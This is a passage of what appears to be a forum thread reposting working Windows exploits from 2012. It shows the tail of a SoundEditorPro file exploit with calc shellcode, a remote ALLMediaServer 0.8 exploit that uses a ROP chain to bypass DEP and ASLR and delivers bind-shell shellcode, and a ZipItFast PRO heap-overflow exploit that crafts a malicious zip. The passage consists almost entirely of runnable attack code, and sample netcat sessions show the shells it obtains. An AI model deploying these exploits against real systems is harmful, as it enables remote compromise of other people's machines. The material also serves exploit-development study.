#----------------------------------
calc = (
"\x31\xD2"                                #
"\x52"                                    #
"\x68\x63\x61\x6C\x63"                    # Stack has arguments for
"\x89\xE6"                                # WinExec -> calc
"\x52"                                    #
"\x56"                                    ########
"\x64\x8B\x72\x30"                        #
"\x8B\x76\x0C"                            #
"\x8B\x76\x0C"                            # Found Kernel32
"\xAD"                                    # base address
"\x8B\x30"                                #
"\x8B\x7E\x18"                            ########
"\x8B\x5F\x3C"                            # Found export table offset
"\x8B\x5C\x1F\x78"                        ########
"\x8B\x74\x1F\x20"                        # Found export names table
"\x01\xFE"                                ########
"\x8B\x4C\x1F\x24"                        # Found export ordinals table
"\x01\xF9"                                ########
"\x42"                                    #
"\xAD"                                    # Found WinExec ordinal
"\x81\x3C\x07\x57\x69\x6E\x45"            #
"\x75\xF5"                                ########
"\x0F\xB7\x54\x51\xFE"                    #
"\x8B\x74\x1F\x1C"                        #
"\x01\xFE"                                # Pop calc ;))
"\x03\x3C\x96"                            #
"\xFF\xD7")                               #

#----------------------------------
# badchars -> '\x00\x0d\x0a'
# 0x0040e02a {pivot 1092}  # ADD ESP,444 # RETN [SoundEditorPro.exe]
# ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
#----------------------------------
b00m = "\x90"*10 + calc
poc = "\x02\x4E\x03\x7C"*61 + rop + b00m + "\x41"*(3880-len(rop + b00m)) + "\x2A\xE0\x40\x00"
                                                                                                                         
try:
    print "[*] Creating exploit file...\n"
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"

1579881651530.png
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Date: 19/08/2012
Name: ALLMediaServer 0.8 SEH&DEP&ASLR

Python:
#!/usr/bin/python 

#----------------------------------------------------------------------------------#
# Exploit: ALLMediaServer 0.8 SEH&DEP&ASLR                                         #
# Author: b33f (Ruben Boonen)                                                      #
# OS: Win7 32-bit PRO SP1                                                          #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications       #
#           /442962ff59a549701f93a6fc4bf94363-ALLMediaServer.exe                   #
#----------------------------------------------------------------------------------#
# root@bt:~/Desktop# python AllServ.py 192.168.111.129                             #
# root@bt:~/Desktop# nc -nv 192.168.111.129 9988                                   #
#  (UNKNOWN) [192.168.111.129] 9988 (?) open                                       #
#  Microsoft Windows [Version 6.1.7601]                                            #
#  Copyright (c) 2009 Microsoft Corporation.  All rights reserved.                 #
#                                                                                  #
#  C:\Program Files\ALLMediaServer>                                                #
#----------------------------------------------------------------------------------#

import sys, socket, struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect((sys.argv[1], 888)) 

#------------------------------------------------
# ROP-Chain generated by Mona!, only minor edits required
# The program is very helpful providing 250000 gadgets and no apparent badchars
#------------------------------------------------
rop = struct.pack('<L',0x6ac35756)   # POP EAX # RETN (avformat-53.dll)
rop += struct.pack('<L',0x671ee4e0)  # <- *&VirtualProtect()
rop += struct.pack('<L',0x6ac7e1ab)  # MOV EAX,DWORD PTR DS:[EAX] # RETN (avformat-53.dll)
rop += struct.pack('<L',0x66330c98)  # XCHG EAX,ESI # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x66248004)  # POP EBP # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x660c5d07)  # ptr to 'jmp esp' (from avcodec-53.dll)
rop += struct.pack('<L',0x665a4005)  # POP EBX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x00000201)  # <- 201-hex or 513-bytes marked as executable (-> ebx)
rop += struct.pack('<L',0x665a0aa0)  # POP ECX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x6ad58001)  # RW pointer (lpOldProtect) (-> ecx)
rop += struct.pack('<L',0x6604820b)  # POP EDI # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x6604820c)  # ROP NOP (-> edi)
rop += struct.pack('<L',0x6672a1e2)  # POP EDX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x00000040)  # newProtect (0x40) (-> edx)
rop += struct.pack('<L',0x6ac35756)  # POP EAX # RETN (avformat-53.dll)
rop += struct.pack('<L',0x90909090)  # NOPS (-> eax)
rop += struct.pack('<L',0x6657f3c0)  # PUSHAD # RETN (avcodec-53.dll)

#------------------------------------------------
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -t c
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
#------------------------------------------------
shellcode = (
"\xdb\xc1\xd9\x74\x24\xf4\xbe\x70\x42\xed\x57\x5d\x29\xc9\xb1"
"\x56\x31\x75\x18\x83\xc5\x04\x03\x75\x64\xa0\x18\xab\x6c\xad"
"\xe3\x54\x6c\xce\x6a\xb1\x5d\xdc\x09\xb1\xcf\xd0\x5a\x97\xe3"
"\x9b\x0f\x0c\x70\xe9\x87\x23\x31\x44\xfe\x0a\xc2\x68\x3e\xc0"
"\x00\xea\xc2\x1b\x54\xcc\xfb\xd3\xa9\x0d\x3b\x09\x41\x5f\x94"
"\x45\xf3\x70\x91\x18\xcf\x71\x75\x17\x6f\x0a\xf0\xe8\x1b\xa0"
"\xfb\x38\xb3\xbf\xb4\xa0\xb8\x98\x64\xd0\x6d\xfb\x59\x9b\x1a"
"\xc8\x2a\x1a\xca\x00\xd2\x2c\x32\xce\xed\x80\xbf\x0e\x29\x26"
"\x5f\x65\x41\x54\xe2\x7e\x92\x26\x38\x0a\x07\x80\xcb\xac\xe3"
"\x30\x18\x2a\x67\x3e\xd5\x38\x2f\x23\xe8\xed\x5b\x5f\x61\x10"
"\x8c\xe9\x31\x37\x08\xb1\xe2\x56\x09\x1f\x45\x66\x49\xc7\x3a"
"\xc2\x01\xea\x2f\x74\x48\x63\x9c\x4b\x73\x73\x8a\xdc\x00\x41"
"\x15\x77\x8f\xe9\xde\x51\x48\x0d\xf5\x26\xc6\xf0\xf5\x56\xce"
"\x36\xa1\x06\x78\x9e\xc9\xcc\x78\x1f\x1c\x42\x29\x8f\xce\x23"
"\x99\x6f\xbe\xcb\xf3\x7f\xe1\xec\xfb\x55\x94\x2a\x32\x8d\xf5"
"\xdc\x37\x31\xde\x18\xb1\xd7\x4a\x31\x97\x40\xe2\xf3\xcc\x58"
"\x95\x0c\x27\xf5\x0e\x9b\x7f\x13\x88\xa4\x7f\x31\xbb\x09\xd7"
"\xd2\x4f\x42\xec\xc3\x50\x4f\x44\x8d\x69\x18\x1e\xe3\x38\xb8"
"\x1f\x2e\xaa\x59\x8d\xb5\x2a\x17\xae\x61\x7d\x70\x00\x78\xeb"
"\x6c\x3b\xd2\x09\x6d\xdd\x1d\x89\xaa\x1e\xa3\x10\x3e\x1a\x87"
"\x02\x86\xa3\x83\x76\x56\xf2\x5d\x20\x10\xac\x2f\x9a\xca\x03"
"\xe6\x4a\x8a\x6f\x39\x0c\x93\xa5\xcf\xf0\x22\x10\x96\x0f\x8a"
"\xf4\x1e\x68\xf6\x64\xe0\xa3\xb2\x95\xab\xe9\x93\x3d\x72\x78"
"\xa6\x23\x85\x57\xe5\x5d\x06\x5d\x96\x99\x16\x14\x93\xe6\x90"
"\xc5\xe9\x77\x75\xe9\x5e\x77\x5c")

#------------------------------------------------
# (1) Pivot through the SEH
#     0x6680c7b6 : {pivot 1100} # ADD ESP,440 # POP EBX # POP ESI # POP EDI # RETN [avcodec-53.dll]
# (2) ROP VirtualProtect()
#     Brings us 32-bytes into our A's
# (3) Shellcode (368-bytes)
#     Current executable space 513-bytes, can be set for more...
#------------------------------------------------
b00m = rop + "\x90"*10 + shellcode
buffer = "JUNK"*8 + b00m + "A"*(1044-len(b00m)) + "\xB6\xC7\x80\x66" + "X"*100
                                                                                                                         
s.send(buffer) 
s.close()

1579881816078.png
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
Date: 12/07/2012
Name: ZipItFast PRO v3.0 Heap-Overflow

Public Release: Exploit-DB

Python:
#!/usr/bin/perl

#---------------------------------------------------------------------------#
# Exploit: ZipItFast PRO v3.0 Heap-Overflow                                 #
# Author: b33f - http://www.fuzzysecurity.com/                              #
# OS: Windows XP SP1                                                        #
# DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/        #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/            #
#           applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe  #
#---------------------------------------------------------------------------#
# Sorry for reinventing the wheel but learning about heap-overflows         #
# requires you to take a step back and roll with the punches not unlike     #
# watching a David Lynch production ;))...                                  #
#                                                                           #
# - "Who is that lady with the log?"                                        #
# + "We call her the log-lady.."                                            #
#---------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.131 9988                                    #
# (UNKNOWN) [192.168.111.131] 9988 (?) open                                 #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:\Documents and Settings\Owner\Desktop>                                  #
#---------------------------------------------------------------------------#

use strict;
use warnings;
 
my $filename = "Exploit.zip";

my $head =
"\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00";
 
my $head2 =
"\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
 
my $head3 =
"\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
my $ph33r =
"\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70" .
"\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44" .
"\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b" .
"\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37" .
"\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c" .
"\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31" .
"\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52" .
"\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c" .
"\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50" .
"\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68" .
"\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53" .
"\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56" .
"\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f" .
"\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54" .
"\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45" .
"\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73" .
"\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c" .
"\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70" .
"\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61" .
"\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f" .
"\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78" .
"\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53" .
"\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46" .
"\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70" .
"\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49" .
"\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70" .
"\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48" .
"\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69" .
"\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50" .
"\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66" .
"\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f" .
"\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68" .
"\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48" .
"\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77" .
"\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31" .
"\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30" .
"\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66" .
"\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56" .
"\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d" .
"\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74" .
"\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e" .
"\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c" .
"\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e" .
"\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77" .
"\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75" .
"\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d" .
"\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70" .
"\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63" .
"\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45" .
"\x41\x41";

my $buf1 = "A" x 4064 . ".txt";

##################
# EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE)
# EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode)
# Jump over Blink and Flink => EB 0A
##################
my $magic = "\xEB\x0A" . "\x0C\x32\xFC\x77" . "\x20\xFA\x12\x00";

##################
# Notice that the offsets don't correspond exactly. I experienced some buffer
# expansion and compression depending on the buffer structure so keep that in
# mind if you want to do some testing.
#
# Remember to set Anti-Debugging flags in your debugger..
# (immunity = > !hidedebug All_Debug)
##################
my $buf2 = "\x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt";
                                                                                                                         
my $zip = $head.$buf1.$head2.$buf2.$head3;
open(FILE,">$filename") || die "[-]Error:\n$!\n";
print FILE $zip;
close(FILE);

1579881948616.png
 
Top